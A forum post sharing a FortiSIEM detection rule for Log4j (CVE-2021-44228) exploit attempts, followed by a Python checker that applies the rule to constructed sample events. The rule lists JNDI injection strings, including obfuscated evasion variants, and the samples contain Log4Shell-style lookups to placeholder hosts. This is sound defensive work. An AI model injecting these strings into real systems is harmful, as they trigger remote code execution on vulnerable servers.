Cybersecurity Forum


Antonio2022
New Contributor II

FortiSIEM Rule to identify Apache log4j exploits (CVE-2021-44228)

Hello there,

The following rule was created and adapted from an Exabeam query. See the original post below.
https://community.exabeam.com/s/article/Detecting-CVE-2021-44228-Log4j2-using-Exabeam


Event type != FortiGate-ips-signature-51006          [we do not want to include any event reported by FortiGate, just events reported by servers]
AND
(
Raw Event Log  CONTAIN  jndi:ldap
OR
Raw Event Log  CONTAIN  jndi:dns
OR
Raw Event Log  CONTAIN  jndi:ldaps
OR
Raw Event Log  CONTAIN  jndi:rmi
OR
Raw Event Log  CONTAIN  j}ndi
OR
Raw Event Log  CONTAIN  jndi%3Aldap
OR
Raw Event Log  CONTAIN  jndi%3Aldns
OR
Raw Event Log  CONTAIN ${jndi:ldap:
OR
Raw Event Log  CONTAIN  ${${::-j}${::-n}${::-d}${::-i}:
OR
Raw Event Log  CONTAIN  ${${::-j}ndi:
OR
Raw Event Log  CONTAIN  ${${lower:jndi}
)

The reason why we are using Raw Event Log is that FortiSIEM is not parsing all WMI application Windows events. The parser has to be modified to capture this information.

An alternative Rule specific for Windows devices could be:
Event type = Win-App-ASP.NET-4.0.30319.0-1309
Raw Event Log   CONTAIN  jndi:ldap

---------------------
False positives:
--------------------
The server's Log4j 2 library version is not within the range 2.0-beta9 to 2.14.1.
You need to either verify this manually on the server(s) or perform some sort of vulnerability scan.


IOCs:
https://securityblue.team/log4j-hunting-and-indicators/
https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv 


I hope it helps
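The rule above, expressed as a small Python checker so it can be tried against sample events outside FortiSIEM. This is an added example, not code from the post or from Fortinet; the event tuples are constructed, the host names are placeholders, and CONTAIN is treated here as a case-sensitive substring match (an assumption).

```python
# Event type the rule excludes: FortiGate IPS already reports these, and the
# post only wants hits reported by the servers themselves.
EXCLUDED_EVENT_TYPE = "FortiGate-ips-signature-51006"

# Substrings from the post's Raw Event Log CONTAIN clauses, in the same order.
JNDI_PATTERNS = [
    "jndi:ldap",
    "jndi:dns",
    "jndi:ldaps",
    "jndi:rmi",
    "j}ndi",
    "jndi%3Aldap",
    "jndi%3Aldns",
    "${jndi:ldap:",
    "${${::-j}${::-n}${::-d}${::-i}:",
    "${${::-j}ndi:",
    "${${lower:jndi}",
]


def matches_rule(event_type, raw_event_log):
    """Return the first pattern that matches, or None if the rule would not fire."""
    if event_type == EXCLUDED_EVENT_TYPE:
        return None
    for pattern in JNDI_PATTERNS:
        if pattern in raw_event_log:  # assumption: CONTAIN is case-sensitive
            return pattern
    return None


def run_rule(events):
    """Apply the rule to (event_type, raw_event_log) tuples; return (index, pattern) hits."""
    hits = []
    for i, (event_type, raw) in enumerate(events):
        pattern = matches_rule(event_type, raw)
        if pattern is not None:
            hits.append((i, pattern))
    return hits


# Constructed sample events (not real logs); hosts are placeholders.
SAMPLE_EVENTS = [
    ("Win-App-ASP.NET-4.0.30319.0-1309",
     "GET /index.html User-Agent: ${jndi:ldap://lookup.invalid/a}"),
    ("Win-App-ASP.NET-4.0.30319.0-1309",
     "GET /login X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:ldap://lookup.invalid/b}"),
    ("FortiGate-ips-signature-51006",
     "attack=Apache.Log4j.Error.Log.Remote.Code.Execution msg=${jndi:ldap://lookup.invalid}"),
    ("Win-App-ASP.NET-4.0.30319.0-1309",
     "GET /healthz User-Agent: Mozilla/5.0"),
]

if __name__ == "__main__":
    for index, pattern in run_rule(SAMPLE_EVENTS):
        print(f"event {index}: matched {pattern!r}")
```

Event 2 is dropped by the event-type exclusion even though its raw log contains a JNDI string, which is exactly the behaviour the first clause of the rule is there to produce.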